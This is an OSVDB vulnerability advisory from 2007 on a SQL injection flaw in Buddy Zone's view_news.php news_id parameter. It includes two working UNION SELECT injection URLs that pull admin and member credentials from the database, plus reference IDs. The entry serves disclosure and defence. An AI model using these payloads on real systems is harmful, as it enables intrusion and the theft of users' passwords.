Buddy Zone view_news.php news_id Variable SQL Injection

2007-06-30T00:00:00
ID OSVDB:38960
Type osvdb
Reporter OSVDB
Modified 2007-06-30T00:00:00

Description

Manual Testing Notes

http://[target]/view_news.php?news_id=-1//UNION//ALL//SELECT//1,concat(admin_user,0x3a,admin_password),3,4,5,6//FROM//admin_users/ http://[target]/view_news.php?news_id=-1//UNION//ALL//SELECT//1,concat(member_email,0x3a,member_password),3,4,5,6//FROM//members/

References:

Related OSVDB ID: 38961 Related OSVDB ID: 38962 ISS X-Force ID: 35187 Generic Exploit URL: http://www.milw0rm.com/exploits/4128 CVE-2007-3526 Bugtraq ID: 24726